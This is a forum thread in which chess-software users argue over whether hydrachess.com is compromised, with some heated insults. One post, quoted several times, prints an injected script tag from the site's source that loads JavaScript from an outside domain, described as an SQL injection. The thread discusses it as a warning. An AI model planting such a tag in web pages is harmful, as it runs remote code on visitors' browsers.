Google says hydrachess.com is dangerous

Discussion of anything and everything relating to chess playing software and machines.

Moderators: hgm, Rebel, chrisw

Christopher Conkie

Re: Google says hydrachess.com is dangerous

Post by Christopher Conkie »

terminator wrote:
mschribr wrote:
Christopher Conkie wrote:5. it lists 44 Errors, 5 warning(s)

6. Scoll below to the source and see all those dodgy javascripts e.g line 108 Dortmund R7: Leko wins Sparkassen Meeting, Ivanchuk beats Kramnik"></title><script src="http://1.verynx.cn/w.js"></script><!--</a>

7. If after all this one cannot understand that a normal site should not be doing this then one is either illiterate or just plain stupid and should not be surfing the very dangerous internet.
Thank you. That was informative.
It is me you should be thanking not Mr Wiseguy.
Why? You have not done anything yet except scaremonger.

Maybe you want a HTML validation prize?

:P
terminator

Post by terminator »

For those who still cannot understand (even if AVG tells you otherwise) or cannot understand why google considers the site unsafe - what you are seeing is called an SQL Injection attack - do some research on this before opening your big mouth and arguing the site is still safe.

It is also un-necessary to use the html validator on ChessBase, I only used the html-validator, because Mr Wiseguy accused me of having made the whole thing up and "putting a dangerous link for others to click on". I would like to ask Mr Wiseguy, why is a chess site running javascript from a chinese site?

If the tools you depend on for considering a site safe/unsafe cannot see a clear compromise in this situation, those tools are giving you a false sense of security.
Christopher Conkie

terminator wrote:For those who still cannot understand (even if AVG tells you otherwise) or cannot understand why google considers the site unsafe - what you are seeing is called an SQL Injection attack - do some research on this before opening your big mouth and arguing the site is still safe.

It is also un-necessary to use the html validator on ChessBase, I only used the html-validator, because Mr Wiseguy accused me of having made the whole thing up and "putting a dangerous link for others to click on". I would like to ask Mr Wiseguy, why is a chess site running javascript from a chinese site?

If the tools you depend on for considering a site safe/unsafe cannot see a clear compromise in this situation, those tools are giving you a false sense of security.
Let's try again.

The script does not exist. The site is therefore NOT running that script.

Mark asked "Is it safe to visit there?"

Answer "Right now, yes"
terminator

Post by terminator »

Christopher Conkie wrote:
Let's try again.

Answer "Right now, yes"
I don't want to accuse you of being stupid or ignorant but what is that code doing on the hydrachess.com/main.cfm ? You would also be accusing google of lying.... are you feeling okay? Some wiseguy accuses a well-known corporation of lying over chinese javascript?

What is an SQL Injection Attack? One should take time to research before opening one's big mouth.
Christopher Conkie

terminator wrote:
Christopher Conkie wrote:
Let's try again.

Answer "Right now, yes"
I don't want to accuse you of being stupid or ignorant but what is that code doing on the hydrachess.com/main.cfm ? You would also be accusing google of lying.... are you feeling okay? Some wiseguy accuses a well-known corporation of lying over chinese javascript?

What is an SQL Injection Attack? One should take time to research before opening one's big mouth.
AVG, McAfee and WOT are large corporations.

So on one hand we have Google v AVG, McAfee and WOT.

Google is not "real time".

AVG, McAfee and WOT are.

You don't know what was in that script. You can speculate but you don't know. Why? Because it is not there now. The website cannot run a script that is not there now. It could have been an SQL Injection attempt in the past. It could also have made little snowflakes flutter across the page at Christmas. It might even be an Anti-Amato script......which would not surprise.

Why don't you send a mail to them at Hydrachess? That might help them. On the other hand I don't think that help is in your vocabulary so best is to stay here and show everyone your HTML validator.
terminator

Post by terminator »

Christopher Conkie wrote: The website is made in FrontPage.

Not every browser is willing to render FrontPage based sites correctly. However I digress from what I wanted to really say.

Here is what you may like to do to improve your surfing experience.......

The Hydra website includes a script that optimises the site for you. The script is installed maybe by your broadband provider. A good stab at this is that you have a USB wireless dongle for your internet connection.

It's called bmi.js.

Read here......

http://forum.vodafone.co.uk/index.php?showtopic=8611

IMO the website is safe. Over safe.

:D

Christopher
Just for the LULZ what incr4edible nonsense......
mschribr

Post by mschribr »

terminator wrote:
mschribr wrote:
Christopher Conkie wrote:5. it lists 44 Errors, 5 warning(s)

6. Scoll below to the source and see all those dodgy javascripts e.g line 108 Dortmund R7: Leko wins Sparkassen Meeting, Ivanchuk beats Kramnik"></title><script src="http://1.verynx.cn/w.js"></script><!--</a>

7. If after all this one cannot understand that a normal site should not be doing this then one is either illiterate or just plain stupid and should not be surfing the very dangerous internet.
Thank you. That was informative.
It is me you should be thanking not Mr Wiseguy.
Oops, sorry about that. In editing the reply I used the wrong name. I should have attributed the quote to terminator (Enrico Amato).
Thank you terminator (Enrico Amato) for that research.
terminator

Post by terminator »

Christopher Conkie wrote:I would check if I were you with your internet provider.

Christopher
Even for someone who is completely web-illiterate, how is your ISP (Internet Service Provider) supposed to control google searches? Some people have a long way to go... and I really mean a long, long, long way to go.
Christopher Conkie

terminator wrote:
Christopher Conkie wrote:I would check if I were you with your internet provider.

Christopher
Even for someone who is completely web-illiterate, how is your ISP (Internet Service Provider) supposed to control google searches? Some people have a long way to go... and I really mean a long, long, long way to go.
No one said they do have anything to do with Google searches.

It is explained above. There are two seperate issues depending on what exact problem you have. If the site is slow for you, and if you have some kind of mobile broadband, that might be why. It is a long time since i've seen a troll like you. A long long long long time.
terminator

Post by terminator »

For those who don't want to pride themselves on being ignorant loudmouths there is the post from the rybka forum which backs up my conclusions.

I have just checked on both symantec web-safe and mcafee site advisor and they have not checked hydrachess.com/main.cfm I can register an account and tell them but I cannot be bothered. I though they were real-time according to our resident Mr wiseguy.

I was greatly entertained by the ignorance of some here and might be tempted to share the views of some here on slashdot, could the site (talkchess) withstand slashdotting (about 1/2 million hits in the space of a short time, enough to bring down most sites) as people see how literate some are on the internet?